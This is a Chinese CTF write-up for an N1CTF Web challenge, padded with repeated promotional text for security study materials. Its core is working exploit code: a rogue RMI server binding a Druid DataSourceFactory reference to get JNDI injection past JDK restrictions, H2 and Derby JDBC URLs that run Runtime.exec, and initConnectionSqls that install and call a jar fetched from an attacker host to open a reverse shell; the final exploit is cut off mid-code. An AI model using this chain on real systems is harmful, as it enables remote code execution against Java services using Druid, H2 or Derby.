第二届N1CTF Web Derby wp jndi注入通过Druid绕过高版本jdk打Derby Rce(1)

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供：

因篇幅有限，仅展示部分资料

网络安全面试题

绿盟护网行动

还有大家最喜欢的黑客技术

网络安全源码合集+工具包

所有资料共282G，朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》，可以扫描下方二维码领取（如遇扫码问题，可以在评论区留言领取哦）~

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

try{
    Registry registry = LocateRegistry.createRegistry(8883);
    Reference ref = new Reference("javax.sql.DataSource","com.alibaba.druid.pool.DruidDataSourceFactory",null);
    String JDBC\_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
    "INFORMATION\_SCHEMA.TABLES AS $$//javascript\n" +
    "java.lang.Runtime.getRuntime().exec('cmd /c calc.exe')\n" +
    "$$\n";
    String JDBC\_USER = "root";
    String JDBC\_PASSWORD = "password";

    ref.add(new StringRefAddr("driverClassName","org.h2.Driver"));
    ref.add(new StringRefAddr("url",JDBC\_URL));
    ref.add(new StringRefAddr("username",JDBC\_USER));
    ref.add(new StringRefAddr("password",JDBC\_PASSWORD));
    ref.add(new StringRefAddr("initialSize","1"));
    ref.add(new StringRefAddr("init","true"));
    ReferenceWrapper referenceWrapper = new ReferenceWrapper(ref);

    Naming.bind("rmi://localhost:8883/zlgExploit",referenceWrapper);
}
catch(Exception e){
    e.printStackTrace();
}

它上面所用的是h2数据库，用的h2的alias来实现的Java代码执行，derby是不行的，在第二篇的derby RCE是要操作数据库，所以我们得换jdbc并且要找到一种方法在数据库连接后反序列化执行sql语句，又因为我们是靶场docker实现的，所以derby大概率不会使用网络模式而会使用内嵌模式直接连接，所以我们无需考虑数据库账号密码问题

找到jdbc

尝试在jadx中搜索对应的驱动方法名，因为pom导入的包在 org.apache.derby，中所以重点看这个路径下的字类，并且一般驱动以Driver结尾

所以driverClassName为：org.apache.derby.jdbc.EmbeddedDriver

找到连接的数据库

chatgpt问出来他的默认存在数据库应该是sample；但是我们可以在连接的时候加上’;create=true’来表示如果这个数据库不存在，则创建；

连接成功

报了个错误，是因为testWhileIdle设置的true，需要一个查询语句来查询，加了validationQuery会引发错误
又受到这篇文章的误导
设置为select 1还是引发报错，这里弄了非常久的时间一度考虑是否是数据库需要密码的情况，最后在另外一篇帖子发现应该使用SELECT 1 FROM SYSIBM.SYSDUMMY1 ；；；▄█▀█●

好，新增一行键值对:

ref.add(new StringRefAddr("validationQuery","SELECT 1 FROM SYSIBM.SYSDUMMY1"));

打derby实现RCE

根据第二篇信息收集给出的exp：
exp.java -> jar

import java.io.IOException;

public class testShell4 {
    public static void exec() throws IOException {
        Runtime.getRuntime().exec("cmd.exe /c calc");
    }
}

sql：

## 导入一个类到数据库中
CALL SQLJ.INSTALL_JAR('http://127.0.0.1:8088/test3.jar', 'APP.Sample4', 0)

## 将这个类加入到derby.database.classpath，这个属性是动态的，不需要重启数据库
CALL SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY('derby.database.classpath','APP.Sample4')

## 创建一个PROCEDURE，EXTERNAL NAME 后面的值可以调用类的static类型方法
CREATE PROCEDURE SALES.TOTAL_REVENUES() PARAMETER STYLE JAVA READS SQL DATA LANGUAGE JAVA EXTERNAL NAME 'testShell4.exec'

## 调用PROCEDURE
CALL SALES.TOTAL_REVENUES()

利用initConnectionSql执行sql

这里执行sql就很麻烦，所以结合第一篇文章找一下有没有可以利用的：
在com.alibaba.druid.pool.DruidDataSourceFactory中实现了ObjectFactory类

在其中找到了很多定义的字符串常量，里面都是可以被我们所利用的


第一段代码我们的代码相调用的对应，第二段就是将reference依次解析成响应的键值对

在里面找到到了这个initConnectionSqls，推测是连接后所执行的sql语句，注意后面带个s，那么是不是可以执行多条sql呢？接下来往下找

我们发现在这里对这个字符串进行了处理，把他按引号进行分割，在使用集合转换为list
有了这个思路就很清晰，直接结合第二篇的exp构造：

ref.add(new StringRefAddr("initConnectionSqls","CALL SQLJ.INSTALL\_JAR('http://XXX.XXX.XXX.XXX:8000/exp.jar', 'APP.Sample2', 0);CALL SYSCS\_UTIL.SYSCS\_SET\_DATABASE\_PROPERTY('derby.database.classpath','APP.Sample2');CREATE PROCEDURE SALES.TOTAL\_Exp2() PARAMETER STYLE JAVA READS SQL DATA LANGUAGE JAVA EXTERNAL NAME 'com.example.testShell4.exec';CALL SALES.TOTAL\_Exp2();"));

并且根据第二篇exp把使用base64编码的反弹shell构造jar包

并放到VPS对应的上，使用python创建一个简单的服务

并且我需要将我伪装的rmi服务器也放到公网上面，这里为了方便，用花生壳来映射rmi端口：

反弹成功读取flag：

exp:

rmi服务器Exp:

try{
            Registry registry = LocateRegistry.createRegistry(8883);
            Reference ref = new Reference("javax.sql.DataSource","com.alibaba.druid.pool.DruidDataSourceFactory",null);
            String JDBC\_URL = "jdbc:derby:sample;create=true";
            ref.add(new StringRefAddr("driverClassName","org.apache.derby.jdbc.EmbeddedDriver"));



还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！


王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。


对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！


【完整版领取方式在文末！！】


***93道网络安全面试题***


![](https://img-blog.csdnimg.cn/img_convert/6679c89ccd849f9504c48bb02882ef8d.png)








![](https://img-blog.csdnimg.cn/img_convert/07ce1a919614bde78921fb2f8ddf0c2f.png)





![](https://img-blog.csdnimg.cn/img_convert/44238619c3ba2d672b5b8dc4a529b01d.png)





内容实在太多，不一一截图了


### 黑客学习资源推荐


最后给大家分享一份全套的网络安全学习资料，给那些想学习 网络安全的小伙伴们一点帮助！


对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。


😝朋友们如果有需要的话，可以联系领取~

#### 1️⃣零基础入门


##### ① 学习路线


对于从来没有接触过网络安全的同学，我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**，大家跟着这个大的方向学习准没问题。


![image](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)


##### ② 路线对应学习视频


同时每个成长路线对应的板块都有配套的视频提供：


![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)


#### 2️⃣视频配套工具&国内外网安书籍、文档


##### ① 工具


![](https://img-blog.csdnimg.cn/img_convert/d3f08d9a26927e48b1332a38401b3369.png#pic_center)


##### ② 视频


![image1](https://img-blog.csdnimg.cn/img_convert/f18acc028dc224b7ace77f2e260ba222.png#pic_center)


##### ③ 书籍


![image2](https://img-blog.csdnimg.cn/img_convert/769b7e13b39771b3a6e4397753dab12e.png#pic_center)

资源较为敏感，未展示全面，需要的最下面获取

![在这里插入图片描述](https://img-blog.csdnimg.cn/e4f9ac066e8c485f8407a99619f9c5b5.png#pic_center)![在这里插入图片描述](https://img-blog.csdnimg.cn/111f5462e7df433b981dc2430bb9ad39.png#pic_center)


##### ② 简历模板


![在这里插入图片描述](https://img-blog.csdnimg.cn/504b8be96bfa4dfb8befc2af49aabfa2.png#pic_center)

 **因篇幅有限，资料较为敏感仅展示部分资料，添加上方即可获取👆**




**网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友，可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！**